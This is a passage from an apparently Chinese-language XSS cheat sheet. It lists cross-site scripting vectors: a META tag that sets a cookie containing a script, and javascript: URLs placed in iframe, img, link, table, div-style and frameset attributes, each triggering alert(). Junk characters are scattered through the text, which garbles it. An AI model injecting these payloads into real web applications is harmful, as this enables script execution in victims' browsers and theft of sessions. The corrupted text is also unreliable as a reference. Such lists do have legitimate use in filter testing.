; V- V# F1 v8 M- o* J* b% N: [8 v <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">. r6 \: u, D% Q; B% x: m
$ z& G6 G* v( U) g2 B& W c </BODY></HTML> 6 J4 |" d# `9 @5 e( k p 4 P8 P# L6 F' b. U" \3 I$ B13. 透过META写入Cookie。 - v# _& l& G% z3 v+ X% d& R( t$ p) @2 ?" d" T: ?
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">6 S9 @( o5 P$ d* g( e7 C
" N/ ~) I6 n4 R
14. javascript in src , href , url0 k# ^1 Z0 R" O1 h( d, ?
; z }$ m8 N+ J& \8 z/ N
<IFRAME SRC=javascript:alert(’13′)></IFRAME> 2 d E: r2 E. ?, ]2 g; r4 ?& y* k8 w4 L3 p' z, D
<img src="javascript:alert(‘XSS3′)"> & `: Y7 w$ g) c7 y5 l, ^7 k: E: z5 w& F* u5 b% Q
<IMG DYNSRC="javascript:alert(‘XSS20′)"> - R: W/ S, N7 k& `) J1 D2 U1 H, T( G e7 T" S+ b. h
<IMG LOWSRC="javascript:alert(‘XSS21′)">( W) } ?* ^' }( }% }) y
g% f8 R" G \ U- A7 }
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">% a, _: q: [* t: k$ P5 M
: S& X! k$ |& D, p, s
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>$ e m+ T2 Z2 Y$ Y* x/ N' |
# X7 d; n+ [( d' ]- m; j4 z! Y
<TABLE BACKGROUND="javascript:alert(‘XSS29′)"> / p$ X- F1 z) O" C. P # N6 `- |* ?& `2 { <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))"> ! R% I2 e/ r. v' J: W 1 E4 s/ u/ K1 L/ q0 f* W <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}+ I! i7 I$ f( V: A( \; }' q; ^
, Q$ X# p: j. i+ Z </STYLE><A CLASS=XSS></A> 5 e& V- t+ Z7 C( |* }/ M ; F9 k. U" a2 O% v <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET> - U! |5 |$ h! N' X/ E# U" z c g1 |2 V. _0 R/ b* A/ Y